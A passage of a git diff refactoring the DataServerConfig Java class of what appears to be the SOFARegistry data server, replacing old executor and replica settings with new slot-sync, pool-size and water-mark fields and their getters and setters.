- } + private volatile int slotSyncPublisherMaxNum = 512; - /** - * Getter method for property syncDataPort. - * - * @return property value of syncDataPort - */ - public int getSyncDataPort() { - return syncDataPort; - } + private int slotSyncRequestExecutorMinPoolSize = OsUtils.getCpuCount() * 3; - /** - * Setter method for property syncDataPort. - * - * @param syncDataPort value to be assigned to property syncDataPort - */ - public void setSyncDataPort(int syncDataPort) { - this.syncDataPort = syncDataPort; - } + private int slotSyncRequestExecutorMaxPoolSize = OsUtils.getCpuCount() * 3; - /** - * Getter method for property metaServerPort. - * - * @return property value of metaServerPort - */ - public int getMetaServerPort() { - return metaServerPort; - } + private int slotSyncRequestExecutorQueueSize = 1000; - /** - * Setter method for property metaServerPort. - * - * @param metaServerPort value to be assigned to property metaServerPort - */ - public void setMetaServerPort(int metaServerPort) { - this.metaServerPort = metaServerPort; - } + private int metaNodeExecutorPoolSize = OsUtils.getCpuCount() * 3; - /** - * Getter method for property httpServerPort. - * - * @return property value of httpServerPort - */ - public int getHttpServerPort() { - return httpServerPort; - } + private int metaNodeExecutorQueueSize = 1000; - /** - * Setter method for property httpServerPort. - * - * @param httpServerPort value to be assigned to property httpServerPort - */ - public void setHttpServerPort(int httpServerPort) { - this.httpServerPort = httpServerPort; - } + private int schedulerHeartbeatIntervalSecs = 1; - /** - * Getter method for property queueCount. - * - * @return property value of queueCount - */ - public int getQueueCount() { - return queueCount; - } + private boolean enableTestApi = false; - /** - * Setter method for property queueCount. - * - * @param queueCount value to be assigned to property queueCount - */ - public void setQueueCount(int queueCount) { - this.queueCount = queueCount; - } + private int cacheDigestIntervalMinutes = 15; - /** - * Getter method for property queueSize. - * - * @return property value of queueSize - */ - public int getQueueSize() { - return queueSize; - } + private int cacheCountIntervalSecs = 30; - /** - * Setter method for property queueSize. - * - * @param queueSize value to be assigned to property queueSize - */ - public void setQueueSize(int queueSize) { - this.queueSize = queueSize; - } + private int lowWaterMark = 1024 * 128; + private int highWaterMark = 1024 * 256; - /** - * Getter method for property notifyIntervalMs. - * - * @return property value of notifyIntervalMs - */ - public int getNotifyIntervalMs() { - return notifyIntervalMs; - } + /** + * constructor + * + * @param commonConfig + */ + public DataServerConfig(CommonConfig commonConfig) { + this.commonConfig = commonConfig; + } - /** - * Setter method for property notifyIntervalMs. - * - * @param notifyIntervalMs value to be assigned to property notifyIntervalMs - */ - public void setNotifyIntervalMs(int notifyIntervalMs) { - this.notifyIntervalMs = notifyIntervalMs; - } + public boolean isLocalDataCenter(String dataCenter) { + return commonConfig.getLocalDataCenter().equals(dataCenter); + } - /** - * Getter method for property rpcTimeout. - * - * @return property value of rpcTimeout - */ - public int getRpcTimeout() { - return rpcTimeout; - } + public String getLocalDataCenter() { + return commonConfig.getLocalDataCenter(); + } - /** - * Setter method for property rpcTimeout. - * - * @param rpcTimeout value to be assigned to property rpcTimeout - */ - public void setRpcTimeout(int rpcTimeout) { - this.rpcTimeout = rpcTimeout; - } + /** + * Getter method for property port. + * + * @return property value of port + */ + public int getPort() { + return port; + } + + /** + * Setter method for property port. + * + * @param port value to be assigned to property port + */ + public void setPort(int port) { + this.port = port; + } + + /** + * Getter method for property syncDataPort. + * + * @return property value of syncDataPort + */ + public int getSyncDataPort() { + return syncDataPort; + } + + /** + * Setter method for property syncDataPort. + * + * @param syncDataPort value to be assigned to property syncDataPort + */ + public void setSyncDataPort(int syncDataPort) { + this.syncDataPort = syncDataPort; + } + + /** + * Getter method for property metaServerPort. + * + * @return property value of metaServerPort + */ + public int getMetaServerPort() { + return metaServerPort; + } + + /** + * Setter method for property metaServerPort. + * + * @param metaServerPort value to be assigned to property metaServerPort + */ + public void setMetaServerPort(int metaServerPort) { + this.metaServerPort = metaServerPort; + } + + /** + * Getter method for property httpServerPort. + * + * @return property value of httpServerPort + */ + public int getHttpServerPort() { + return httpServerPort; + } + + /** + * Setter method for property httpServerPort. + * + * @param httpServerPort value to be assigned to property httpServerPort + */ + public void setHttpServerPort(int httpServerPort) { + this.httpServerPort = httpServerPort; + } + + /** + * Getter method for property notifyIntervalMs. + * + * @return property value of notifyIntervalMs + */ + public int getNotifyIntervalMillis() { + return notifyIntervalMillis; + } + + /** + * Setter method for property notifyIntervalMs. + * + * @param notifyIntervalMillis value to be assigned to property notifyIntervalMs + */ + public void setNotifyIntervalMillis(int notifyIntervalMillis) { + this.notifyIntervalMillis = notifyIntervalMillis; + } + + /** + * Getter method for property notifyTempDataIntervalMs. + * + * @return property value of notifyTempDataIntervalMs + */ + public int getNotifyTempDataIntervalMillis() { + return notifyTempDataIntervalMillis; + } + + /** + * Setter method for property notifyTempDataIntervalMs. + * + * @param notifyTempDataIntervalMillis value to be assigned to property notifyTempDataIntervalMs + */ + public void setNotifyTempDataIntervalMillis(int notifyTempDataIntervalMillis) { + this.notifyTempDataIntervalMillis = notifyTempDataIntervalMillis; + } + + /** + * Getter method for property rpcTimeout. + * + * @return property value of rpcTimeout + */ + public int getRpcTimeoutMillis() { + return rpcTimeoutMillis; + } + + /** + * Setter method for property rpcTimeout. + * + * @param rpcTimeoutMillis value to be assigned to property rpcTimeout + */ + public void setRpcTimeoutMillis(int rpcTimeoutMillis) { + this.rpcTimeoutMillis = rpcTimeoutMillis; + } + + /** + * Getter method for property getDataExecutorMinPoolSize. + * + * @return property value of getDataExecutorMinPoolSize + */ + public int getGetDataExecutorMinPoolSize() { + return getDataExecutorMinPoolSize; + } + + /** + * Getter method for property getDataExecutorMaxPoolSize. + * + * @return property value of getDataExecutorMaxPoolSize + */ + public int getGetDataExecutorMaxPoolSize() { + return getDataExecutorMaxPoolSize; + } + + /** + * Getter method for property getDataExecutorQueueSize. + * + * @return property value of getDataExecutorQueueSize + */ + public int getGetDataExecutorQueueSize() { + return getDataExecutorQueueSize; + } + + /** + * Getter method for property getDataExecutorKeepAliveTime. + * + * @return property value of getDataExecutorKeepAliveTime + */ + public long getGetDataExecutorKeepAliveTime() { + return getDataExecutorKeepAliveTime; + } + + /** + * Setter method for property getDataExecutorMinPoolSize. + * + * @param getDataExecutorMinPoolSize value to be assigned to property getDataExecutorMinPoolSize + */ + public void setGetDataExecutorMinPoolSize(int getDataExecutorMinPoolSize) { + this.getDataExecutorMinPoolSize = getDataExecutorMinPoolSize; + } + + /** + * Setter method for property getDataExecutorMaxPoolSize. + * + * @param getDataExecutorMaxPoolSize value to be assigned to property getDataExecutorMaxPoolSize + */ + public void setGetDataExecutorMaxPoolSize(int getDataExecutorMaxPoolSize) { + this.getDataExecutorMaxPoolSize = getDataExecutorMaxPoolSize; + } + + /** + * Setter method for property getDataExecutorQueueSize. + * + * @param getDataExecutorQueueSize value to be assigned to property getDataExecutorQueueSize + */ + public void setGetDataExecutorQueueSize(int getDataExecutorQueueSize) { + this.getDataExecutorQueueSize = getDataExecutorQueueSize; + } + + /** + * Setter method for property getDataExecutorKeepAliveTime. + * + * @param getDataExecutorKeepAliveTime value to be assigned to property + * getDataExecutorKeepAliveTime + */ + public void setGetDataExecutorKeepAliveTime(long getDataExecutorKeepAliveTime) { + this.getDataExecutorKeepAliveTime = getDataExecutorKeepAliveTime; + } + + /** + * Getter method for property publishExecutorMinPoolSize. + * + * @return property value of publishExecutorMinPoolSize + */ + public int getPublishExecutorMinPoolSize() { + return publishExecutorMinPoolSize; + } + + /** + * Setter method for property publishExecutorMinPoolSize. + * + * @param publishExecutorMinPoolSize value to be assigned to property publishExecutorMinPoolSize + */ + public void setPublishExecutorMinPoolSize(int publishExecutorMinPoolSize) { + this.publishExecutorMinPoolSize = publishExecutorMinPoolSize; + } + + /** + * Getter method for property publishExecutorMaxPoolSize. + * + * @return property value of publishExecutorMaxPoolSize + */ + public int getPublishExecutorMaxPoolSize() { + return publishExecutorMaxPoolSize; + } + + /** + * Setter method for property publishExecutorMaxPoolSize. + * + * @param publishExecutorMaxPoolSize value to be assigned to property publishExecutorMaxPoolSize + */ + public void setPublishExecutorMaxPoolSize(int publishExecutorMaxPoolSize) { + this.publishExecutorMaxPoolSize = publishExecutorMaxPoolSize; + } + + /** + * Getter method for property publishExecutorQueueSize. + * + * @return property value of publishExecutorQueueSize + */ + public int getPublishExecutorQueueSize() { + return publishExecutorQueueSize; + } + + /** + * Setter method for property publishExecutorQueueSize. + * + * @param publishExecutorQueueSize value to be assigned to property publishExecutorQueueSize + */ + public void setPublishExecutorQueueSize(int publishExecutorQueueSize) { + this.publishExecutorQueueSize = publishExecutorQueueSize; + } + + /** + * Getter method for property metaServerIpAddress. + * + * @return property value of metaServerIpAddress + */ + public Collection getMetaServerAddresses() { + final Collection addresses = metaAddresses; + if (addresses != null) { + return addresses; + } + metaAddresses = + ServerEnv.getMetaAddresses(commonConfig.getMetaNode(), commonConfig.getLocalDataCenter()); + return metaAddresses; + } + + /** + * Getter method for property sessionLeaseSec. + * + * @return property value of sessionLeaseSec + */ + public int getSessionLeaseSecs() { + return sessionLeaseSecs; + } + + /** + * Setter method for property sessionLeaseSec. + * + * @param sessionLeaseSecs value to be assigned to property sessionLeaseSec + */ + public void setSessionLeaseSecs(int sessionLeaseSecs) { + this.sessionLeaseSecs = sessionLeaseSecs; + } + + /** + * Getter method for property datumCompactDelaySecs. + * + * @return property value of datumCompactDelaySecs + */ + public int getDatumCompactDelaySecs() { + return datumCompactDelaySecs; + } + + /** + * Setter method for property datumCompactDelaySecs. + * + * @param datumCompactDelaySecs value to be assigned to property datumCompactDelaySecs + */ + public void setDatumCompactDelaySecs(int datumCompactDelaySecs) { + this.datumCompactDelaySecs = datumCompactDelaySecs; + } + + /** + * Getter method for property slotSyncPublisherDigestMaxNum. + * + * @return property value of slotSyncPublisherDigestMaxNum + */ + public int getSlotSyncPublisherDigestMaxNum() { + return slotSyncPublisherDigestMaxNum; + } + + /** + * Setter method for property slotSyncPublisherDigestMaxNum. + * + * @param slotSyncPublisherDigestMaxNum value to be assigned to property + * slotSyncPublisherDigestMaxNum + */ + public void setSlotSyncPublisherDigestMaxNum(int slotSyncPublisherDigestMaxNum) { + this.slotSyncPublisherDigestMaxNum = slotSyncPublisherDigestMaxNum; + } + + /** + * Getter method for property slotSyncPublisherMaxNum. + * + * @return property value of slotSyncPublisherMaxNum + */ + public int getSlotSyncPublisherMaxNum() { + return slotSyncPublisherMaxNum; + } + + /** + * Setter method for property slotSyncPublisherMaxNum. + * + * @param slotSyncPublisherMaxNum value to be assigned to property slotSyncPublisherMaxNum + */ + public void setSlotSyncPublisherMaxNum(int slotSyncPublisherMaxNum) { + this.slotSyncPublisherMaxNum = slotSyncPublisherMaxNum; + } + + /** + * Getter method for property slotLeaderSyncSessionExecutorThreadSize. + * + * @return property value of slotLeaderSyncSessionExecutorThreadSize + */ + public int getSlotLeaderSyncSessionExecutorThreadSize() { + return slotLeaderSyncSessionExecutorThreadSize; + } + + /** + * Setter method for property slotLeaderSyncSessionExecutorThreadSize. + * + * @param slotLeaderSyncSessionExecutorThreadSize value to be assigned to property + * slotLeaderSyncSessionExecutorThreadSize + */ + public void setSlotLeaderSyncSessionExecutorThreadSize( + int slotLeaderSyncSessionExecutorThreadSize) { + this.slotLeaderSyncSessionExecutorThreadSize = slotLeaderSyncSessionExecutorThreadSize; + } + + /** + * Getter method for property slotLeaderSyncSessionIntervalMs. + * + * @return property value of slotLeaderSyncSessionIntervalMs + */ + public int getSlotLeaderSyncSessionIntervalSecs() { + return slotLeaderSyncSessionIntervalSecs; + } + + /** + * Setter method for property slotLeaderSyncSessionIntervalSec. + * + * @param slotLeaderSyncSessionIntervalSecs value to be assigned to property + * slotLeaderSyncSessionIntervalSec + */ + public void setSlotLeaderSyncSessionIntervalSecs(int slotLeaderSyncSessionIntervalSecs) { + this.slotLeaderSyncSessionIntervalSecs = slotLeaderSyncSessionIntervalSecs; + } + + /** + * Getter method for property slotFollowerSyncLeaderExecutorThreadSize. + * + * @return property value of slotFollowerSyncLeaderExecutorThreadSize + */ + public int getSlotFollowerSyncLeaderExecutorThreadSize() { + return slotFollowerSyncLeaderExecutorThreadSize; + } + + /** + * Setter method for property slotFollowerSyncLeaderExecutorThreadSize. + * + * @param slotFollowerSyncLeaderExecutorThreadSize value to be assigned to property + * slotFollowerSyncLeaderExecutorThreadSize + */ + public void setSlotFollowerSyncLeaderExecutorThreadSize( + int slotFollowerSyncLeaderExecutorThreadSize) { + this.slotFollowerSyncLeaderExecutorThreadSize = slotFollowerSyncLeaderExecutorThreadSize; + } + + /** + * Getter method for property slotFollowerSyncLeaderIntervalSec. + * + * @return property value of slotFollowerSyncLeaderIntervalSec + */ + public int getSlotFollowerSyncLeaderIntervalSecs() { + return slotFollowerSyncLeaderIntervalSecs; + } + + /** + * Setter method for property slotFollowerSyncLeaderIntervalSec. + * + * @param slotFollowerSyncLeaderIntervalSecs value to be assigned to property + * slotFollowerSyncLeaderIntervalSec + */ + public void setSlotFollowerSyncLeaderIntervalSecs(int slotFollowerSyncLeaderIntervalSecs) { + this.slotFollowerSyncLeaderIntervalSecs = slotFollowerSyncLeaderIntervalSecs; + } + + /** + * Getter method for property slotLeaderSyncSessionExecutorQueueSize. + * + * @return property value of slotLeaderSyncSessionExecutorQueueSize + */ + public int getSlotLeaderSyncSessionExecutorQueueSize() { + return slotLeaderSyncSessionExecutorQueueSize; + } + + /** + * Setter method for property slotLeaderSyncSessionExecutorQueueSize. + * + * @param slotLeaderSyncSessionExecutorQueueSize value to be assigned to property + * slotLeaderSyncSessionExecutorQueueSize + */ + public void setSlotLeaderSyncSessionExecutorQueueSize( + int slotLeaderSyncSessionExecutorQueueSize) { + this.slotLeaderSyncSessionExecutorQueueSize = slotLeaderSyncSessionExecutorQueueSize; + } + + /** + * Getter method for property slotFollowerSyncLeaderExecutorQueueSize. + * + * @return property value of slotFollowerSyncLeaderExecutorQueueSize + */ + public int getSlotFollowerSyncLeaderExecutorQueueSize() { + return slotFollowerSyncLeaderExecutorQueueSize; + } + + /** + * Setter method for property slotFollowerSyncLeaderExecutorQueueSize. + * + * @param slotFollowerSyncLeaderExecutorQueueSize value to be assigned to property + * slotFollowerSyncLeaderExecutorQueueSize + */ + public void setSlotFollowerSyncLeaderExecutorQueueSize( + int slotFollowerSyncLeaderExecutorQueueSize) { + this.slotFollowerSyncLeaderExecutorQueueSize = slotFollowerSyncLeaderExecutorQueueSize; + } + + /** + * Getter method for property slotSyncRequestExecutorMinPoolSize. + * + * @return property value of slotSyncRequestExecutorMinPoolSize + */ + public int getSlotSyncRequestExecutorMinPoolSize() { + return slotSyncRequestExecutorMinPoolSize; + } + + /** + * Setter method for property slotSyncRequestExecutorMinPoolSize. + * + * @param slotSyncRequestExecutorMinPoolSize value to be assigned to property + * slotSyncRequestExecutorMinPoolSize + */ + public void setSlotSyncRequestExecutorMinPoolSize(int slotSyncRequestExecutorMinPoolSize) { + this.slotSyncRequestExecutorMinPoolSize = slotSyncRequestExecutorMinPoolSize; + } + + /** + * Getter method for property slotSyncRequestExecutorMaxPoolSize. + * + * @return property value of slotSyncRequestExecutorMaxPoolSize + */ + public int getSlotSyncRequestExecutorMaxPoolSize() { + return slotSyncRequestExecutorMaxPoolSize; + } + + /** + * Setter method for property slotSyncRequestExecutorMaxPoolSize. + * + * @param slotSyncRequestExecutorMaxPoolSize value to be assigned to property + * slotSyncRequestExecutorMaxPoolSize + */ + public void setSlotSyncRequestExecutorMaxPoolSize(int slotSyncRequestExecutorMaxPoolSize) { + this.slotSyncRequestExecutorMaxPoolSize = slotSyncRequestExecutorMaxPoolSize; + } + + /** + * Getter method for property slotSyncRequestExecutorQueueSize. + * + * @return property value of slotSyncRequestExecutorQueueSize + */ + public int getSlotSyncRequestExecutorQueueSize() { + return slotSyncRequestExecutorQueueSize; + } + + /** + * Setter method for property slotSyncRequestExecutorQueueSize. + * + * @param slotSyncRequestExecutorQueueSize value to be assigned to property + * slotSyncRequestExecutorQueueSize + */ + public void setSlotSyncRequestExecutorQueueSize(int slotSyncRequestExecutorQueueSize) { + this.slotSyncRequestExecutorQueueSize = slotSyncRequestExecutorQueueSize; + } + + /** + * Getter method for property schedulerHeartbeatIntervalSec. + * + * @return property value of schedulerHeartbeatIntervalSec + */ + public int getSchedulerHeartbeatIntervalSecs() { + return schedulerHeartbeatIntervalSecs; + } + + /** + * Setter method for property schedulerHeartbeatIntervalSec. + * + * @param schedulerHeartbeatIntervalSecs value to be assigned to property + * schedulerHeartbeatIntervalSec + */ + public void setSchedulerHeartbeatIntervalSecs(int schedulerHeartbeatIntervalSecs) { + this.schedulerHeartbeatIntervalSecs = schedulerHeartbeatIntervalSecs; + } + + /** + * Getter method for property syncSessionPort. + * + * @return property value of syncSessionPort + */ + public int getSyncSessionPort() { + return syncSessionPort; + } + + /** + * Setter method for property syncSessionPort. + * + * @param syncSessionPort value to be assigned to property syncSessionPort + */ + public void setSyncSessionPort(int syncSessionPort) { + this.syncSessionPort = syncSessionPort; + } + + public boolean isEnableTestApi() { + return enableTestApi; + } + + public void setEnableTestApi(boolean enableTestApi) { + this.enableTestApi = enableTestApi; + } + + public int getNotifyMaxItems() { + return notifyMaxItems; + } + + public void setNotifyMaxItems(int notifyMaxItems) { + this.notifyMaxItems = notifyMaxItems; + } + + public int getNotifyExecutorPoolSize() { + return notifyExecutorPoolSize; + } + + public void setNotifyExecutorPoolSize(int notifyExecutorPoolSize) { + this.notifyExecutorPoolSize = notifyExecutorPoolSize; + } + + public int getNotifyExecutorQueueSize() { + return notifyExecutorQueueSize; + } + + public void setNotifyExecutorQueueSize(int notifyExecutorQueueSize) { + this.notifyExecutorQueueSize = notifyExecutorQueueSize; + } + + public int getNotifyTempExecutorPoolSize() { + return notifyTempExecutorPoolSize; + } + + public void setNotifyTempExecutorPoolSize(int notifyTempExecutorPoolSize) { + this.notifyTempExecutorPoolSize = notifyTempExecutorPoolSize; + } + + public int getNotifyTempExecutorQueueSize() { + return notifyTempExecutorQueueSize; + } + + public void setNotifyTempExecutorQueueSize(int notifyTempExecutorQueueSize) { + this.notifyTempExecutorQueueSize = notifyTempExecutorQueueSize; + } + + public int getNotifyRetryQueueSize() { + return notifyRetryQueueSize; + } + + public void setNotifyRetryQueueSize(int notifyRetryQueueSize) { + this.notifyRetryQueueSize = notifyRetryQueueSize; + } + + public int getNotifyRetryTimes() { + return notifyRetryTimes; + } + + public void setNotifyRetryTimes(int notifyRetryTimes) { + this.notifyRetryTimes = notifyRetryTimes; + } + + public int getCacheDigestIntervalMinutes() { + return cacheDigestIntervalMinutes; + } + + public void setCacheDigestIntervalMinutes(int cacheDigestIntervalMinutes) { + this.cacheDigestIntervalMinutes = cacheDigestIntervalMinutes; + } + + public int getCacheCountIntervalSecs() { + return cacheCountIntervalSecs; + } + + public void setCacheCountIntervalSecs(int cacheCountIntervalSecs) { + this.cacheCountIntervalSecs = cacheCountIntervalSecs; + } + + public int getNotifyRetryBackoffMillis() { + return notifyRetryBackoffMillis; + } + + public void setNotifyRetryBackoffMillis(int notifyRetryBackoffMillis) { + this.notifyRetryBackoffMillis = notifyRetryBackoffMillis; + } + + public int getLowWaterMark() { + return lowWaterMark; + } + + public void setLowWaterMark(int lowWaterMark) { + this.lowWaterMark = lowWaterMark; + } + + public int getHighWaterMark() { + return highWaterMark; + } - /** - * Getter method for property storeNodes. - * - * @return property value of storeNodes - */ - public int getStoreNodes() { - return storeNodes; - } + public void setHighWaterMark(int highWaterMark) { + this.highWaterMark = highWaterMark; + } - /** - * Setter method for property storeNodes. - * - * @param storeNodes value to be assigned to property storeNodes - */ - public void setStoreNodes(int storeNodes) { - this.storeNodes = storeNodes; - } + public int getSessionLeaseCheckIntervalSecs() { + return sessionLeaseCheckIntervalSecs; + } - /** - * Getter method for property numberOfReplicas. - * - * @return property value of numberOfReplicas - */ - public int getNumberOfReplicas() { - return numberOfReplicas; - } + public void setSessionLeaseCheckIntervalSecs(int sessionLeaseCheckIntervalSecs) { + this.sessionLeaseCheckIntervalSecs = sessionLeaseCheckIntervalSecs; + } - /** - * Setter method for property numberOfReplicas. - * - * @param numberOfReplicas value to be assigned to property numberOfReplicas - */ - public void setNumberOfReplicas(int numberOfReplicas) { - this.numberOfReplicas = numberOfReplicas; - } + public int getNotifyPort() { + return notifyPort; + } - /** - * Getter method for property localDataServerCleanDelay. - * - * @return property value of localDataServerCleanDelay - */ - public long getLocalDataServerCleanDelay() { - return localDataServerCleanDelay; - } + public void setNotifyPort(int notifyPort) { + this.notifyPort = notifyPort; + } - /** - * Setter method for property localDataServerCleanDelay. - * - * @param localDataServerCleanDelay value to be assigned to property localDataServerCleanDelay - */ - public void setLocalDataServerCleanDelay(long localDataServerCleanDelay) { - this.localDataServerCleanDelay = localDataServerCleanDelay; - } + public int getSyncDataConnNum() { + return syncDataConnNum; + } - /** - * Getter method for property getDataExecutorMinPoolSize. - * - * @return property value of getDataExecutorMinPoolSize - */ - public int getGetDataExecutorMinPoolSize() { - return getDataExecutorMinPoolSize; - } + public void setSyncDataConnNum(int syncDataConnNum) { + this.syncDataConnNum = syncDataConnNum; + } - /** - * Getter method for property getDataExecutorMaxPoolSize. - * - * @return property value of getDataExecutorMaxPoolSize - */ - public int getGetDataExecutorMaxPoolSize() { - return getDataExecutorMaxPoolSize; - } + public int getSyncSessionConnNum() { + return syncSessionConnNum; + } - /** - * Getter method for property getDataExecutorQueueSize. - * - * @return property value of getDataExecutorQueueSize - */ - public int getGetDataExecutorQueueSize() { - return getDataExecutorQueueSize; - } + public void setSyncSessionConnNum(int syncSessionConnNum) { + this.syncSessionConnNum = syncSessionConnNum; + } - /** - * Getter method for property getDataExecutorKeepAliveTime. - * - * @return property value of getDataExecutorKeepAliveTime - */ - public long getGetDataExecutorKeepAliveTime() { - return getDataExecutorKeepAliveTime; - } + public int getMetaNodeExecutorPoolSize() { + return metaNodeExecutorPoolSize; + } - /** - * Setter method for property getDataExecutorMinPoolSize. - * - * @param getDataExecutorMinPoolSize value to be assigned to property getDataExecutorMinPoolSize - */ - public void setGetDataExecutorMinPoolSize(int getDataExecutorMinPoolSize) { - this.getDataExecutorMinPoolSize = getDataExecutorMinPoolSize; - } + public void setMetaNodeExecutorPoolSize(int metaNodeExecutorPoolSize) { + this.metaNodeExecutorPoolSize = metaNodeExecutorPoolSize; + } - /** - * Setter method for property getDataExecutorMaxPoolSize. - * - * @param getDataExecutorMaxPoolSize value to be assigned to property getDataExecutorMaxPoolSize - */ - public void setGetDataExecutorMaxPoolSize(int getDataExecutorMaxPoolSize) { - this.getDataExecutorMaxPoolSize = getDataExecutorMaxPoolSize; - } + public int getMetaNodeExecutorQueueSize() { + return metaNodeExecutorQueueSize; + } - /** - * Setter method for property getDataExecutorQueueSize. - * - * @param getDataExecutorQueueSize value to be assigned to property getDataExecutorQueueSize - */ - public void setGetDataExecutorQueueSize(int getDataExecutorQueueSize) { - this.getDataExecutorQueueSize = getDataExecutorQueueSize; - } + public void setMetaNodeExecutorQueueSize(int metaNodeExecutorQueueSize) { + this.metaNodeExecutorQueueSize = metaNodeExecutorQueueSize; + } - /** - * Setter method for property getDataExecutorKeepAliveTime. - * - * @param getDataExecutorKeepAliveTime value to be assigned to property getDataExecutorKeepAliveTime - */ - public void setGetDataExecutorKeepAliveTime(long getDataExecutorKeepAliveTime) { - this.getDataExecutorKeepAliveTime = getDataExecutorKeepAliveTime; - } + public int getSessionLeaseCleanDeadlineSecs() { + return sessionLeaseCleanDeadlineSecs; + } - /** - * Getter method for property notifyDataSyncExecutorMinPoolSize. - * - * @return property value of notifyDataSyncExecutorMinPoolSize - */ - public int getNotifyDataSyncExecutorMinPoolSize() { - return notifyDataSyncExecutorMinPoolSize; - } + public void setSessionLeaseCleanDeadlineSecs(int sessionLeaseCleanDeadlineSecs) { + this.sessionLeaseCleanDeadlineSecs = sessionLeaseCleanDeadlineSecs; + } - /** - * Setter method for property notifyDataSyncExecutorMinPoolSize. - * - * @param notifyDataSyncExecutorMinPoolSize value to be assigned to property notifyDataSyncExecutorMinPoolSize - */ - public void setNotifyDataSyncExecutorMinPoolSize(int notifyDataSyncExecutorMinPoolSize) { - this.notifyDataSyncExecutorMinPoolSize = notifyDataSyncExecutorMinPoolSize; - } - - /** - * Getter method for property notifyDataSyncExecutorMaxPoolSize. - * - * @return property value of notifyDataSyncExecutorMaxPoolSize - */ - public int getNotifyDataSyncExecutorMaxPoolSize() { - return notifyDataSyncExecutorMaxPoolSize; - } - - /** - * Setter method for property notifyDataSyncExecutorMaxPoolSize. - * - * @param notifyDataSyncExecutorMaxPoolSize value to be assigned to property notifyDataSyncExecutorMaxPoolSize - */ - public void setNotifyDataSyncExecutorMaxPoolSize(int notifyDataSyncExecutorMaxPoolSize) { - this.notifyDataSyncExecutorMaxPoolSize = notifyDataSyncExecutorMaxPoolSize; - } - - /** - * Getter method for property notifyDataSyncExecutorQueueSize. - * - * @return property value of notifyDataSyncExecutorQueueSize - */ - public int getNotifyDataSyncExecutorQueueSize() { - return notifyDataSyncExecutorQueueSize; - } - - /** - * Setter method for property notifyDataSyncExecutorQueueSize. - * - * @param notifyDataSyncExecutorQueueSize value to be assigned to property notifyDataSyncExecutorQueueSize - */ - public void setNotifyDataSyncExecutorQueueSize(int notifyDataSyncExecutorQueueSize) { - this.notifyDataSyncExecutorQueueSize = notifyDataSyncExecutorQueueSize; - } - - /** - * Getter method for property notifyDataSyncExecutorKeepAliveTime. - * - * @return property value of notifyDataSyncExecutorKeepAliveTime - */ - public long getNotifyDataSyncExecutorKeepAliveTime() { - return notifyDataSyncExecutorKeepAliveTime; - } - - /** - * Setter method for property notifyDataSyncExecutorKeepAliveTime. - * - * @param notifyDataSyncExecutorKeepAliveTime value to be assigned to property notifyDataSyncExecutorKeepAliveTime - */ - public void setNotifyDataSyncExecutorKeepAliveTime(long notifyDataSyncExecutorKeepAliveTime) { - this.notifyDataSyncExecutorKeepAliveTime = notifyDataSyncExecutorKeepAliveTime; - } - - /** - * Getter method for property notifySessionRetryFirstDelay. - * - * @return property value of notifySessionRetryFirstDelay - */ - public long getNotifySessionRetryFirstDelay() { - return notifySessionRetryFirstDelay; - } - - /** - * Setter method for property notifySessionRetryFirstDelay. - * - * @param notifySessionRetryFirstDelay value to be assigned to property notifySessionRetryFirstDelay - */ - public void setNotifySessionRetryFirstDelay(long notifySessionRetryFirstDelay) { - this.notifySessionRetryFirstDelay = notifySessionRetryFirstDelay; - } - - /** - * Getter method for property notifySessionRetryIncrementDelay. - * - * @return property value of notifySessionRetryIncrementDelay - */ - public long getNotifySessionRetryIncrementDelay() { - return notifySessionRetryIncrementDelay; - } - - /** - * Setter method for property notifySessionRetryIncrementDelay. - * - * @param notifySessionRetryIncrementDelay value to be assigned to property notifySessionRetryIncrementDelay - */ - public void setNotifySessionRetryIncrementDelay(long notifySessionRetryIncrementDelay) { - this.notifySessionRetryIncrementDelay = notifySessionRetryIncrementDelay; - } - - /** - * Getter method for property clientOffDelayMs. - * - * @return property value of clientOffDelayMs - */ - public int getClientOffDelayMs() { - return clientOffDelayMs; - } - - /** - * Setter method for property clientOffDelayMs. - * - * @param clientOffDelayMs value to be assigned to property clientOffDelayMs - */ - public void setClientOffDelayMs(int clientOffDelayMs) { - this.clientOffDelayMs = clientOffDelayMs; - } - - /** - * Getter method for property publishExecutorMinPoolSize. - * - * @return property value of publishExecutorMinPoolSize - */ - public int getPublishExecutorMinPoolSize() { - return publishExecutorMinPoolSize; - } - - /** - * Setter method for property publishExecutorMinPoolSize. - * - * @param publishExecutorMinPoolSize value to be assigned to property publishExecutorMinPoolSize - */ - public void setPublishExecutorMinPoolSize(int publishExecutorMinPoolSize) { - this.publishExecutorMinPoolSize = publishExecutorMinPoolSize; - } - - /** - * Getter method for property publishExecutorMaxPoolSize. - * - * @return property value of publishExecutorMaxPoolSize - */ - public int getPublishExecutorMaxPoolSize() { - return publishExecutorMaxPoolSize; - } - - /** - * Setter method for property publishExecutorMaxPoolSize. - * - * @param publishExecutorMaxPoolSize value to be assigned to property publishExecutorMaxPoolSize - */ - public void setPublishExecutorMaxPoolSize(int publishExecutorMaxPoolSize) { - this.publishExecutorMaxPoolSize = publishExecutorMaxPoolSize; - } - - /** - * Getter method for property publishExecutorQueueSize. - * - * @return property value of publishExecutorQueueSize - */ - public int getPublishExecutorQueueSize() { - return publishExecutorQueueSize; - } - - /** - * Setter method for property publishExecutorQueueSize. - * - * @param publishExecutorQueueSize value to be assigned to property publishExecutorQueueSize - */ - public void setPublishExecutorQueueSize(int publishExecutorQueueSize) { - this.publishExecutorQueueSize = publishExecutorQueueSize; - } - - /** - * Getter method for property metaServerIpAddress. - * - * @return property value of metaServerIpAddress - */ - public Set getMetaServerIpAddresses() { - if (metaIps != null && !metaIps.isEmpty()) { - return metaIps; - } - metaIps = new HashSet<>(); - if (commonConfig != null) { - Map> metaMap = commonConfig.getMetaNode(); - if (metaMap != null && !metaMap.isEmpty()) { - String localDataCenter = commonConfig.getLocalDataCenter(); - if (localDataCenter != null && !localDataCenter.isEmpty()) { - Collection metas = metaMap.get(localDataCenter); - if (metas != null && !metas.isEmpty()) { - metaIps = metas.stream().map(NetUtil::getIPAddressFromDomain).collect(Collectors.toSet()); - } - } - } - } - return metaIps; - } - - /** - * Getter method for property notifySessionRetryTimes. - * - * @return property value of notifySessionRetryTimes - */ - public int getNotifySessionRetryTimes() { - return notifySessionRetryTimes; - } - - /** - * Setter method for property notifySessionRetryTimes . - * - * @param notifySessionRetryTimes value to be assigned to property notifySessionRetryTimes - */ - public void setNotifySessionRetryTimes(int notifySessionRetryTimes) { - this.notifySessionRetryTimes = notifySessionRetryTimes; - } + @Override + public String toString() { + return ToStringBuilder.reflectionToString(this, ToStringStyle.MULTI_LINE_STYLE); + } } diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerInitializer.java 